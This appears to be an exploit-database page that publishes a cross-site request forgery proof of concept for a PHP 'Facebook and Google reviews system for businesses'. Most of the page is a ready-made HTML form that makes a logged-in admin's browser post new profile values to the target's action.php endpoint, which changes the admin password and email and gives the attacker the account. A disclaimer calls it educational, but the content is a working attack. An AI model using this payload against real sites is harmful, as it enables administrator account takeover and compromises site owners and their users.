Facebook and google reviews system for businesses crosssite request forgery (change admin password) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-12-14 | Type : webapps | Platform : php
This exploit / vulnerability Facebook and google reviews system for businesses crosssite request forgery (change admin password) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery
# Date: 2018-12-13
# Exploit Author: Veyselxan
# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?s_rank=38
# Version: v1 (REQUIRED)
# Tested on: Linux

# 1 Poof Of Concept (Change password):
<html>
<body>
<form action="http://Target/action.php?action=profile" method="post" class="form-horizontal form-bordered">
<input class="form-control" name="name" value="Admin" type="text">
<input class="form-control" name="email" value="admin@ranksol.com" type="text">
<input class="form-control" name="password" value="password" type="text">
<input class="form-control" name="phone" value="+18323041166" type="text">
<input type="hidden" name="id" value="1">
<button type="submit" name="submit" value="submit" class="btn btn-fill btn-success "><span class="ace-icon fa fa-save bigger-120"></span>Save</button>
</form>
</body>
</html>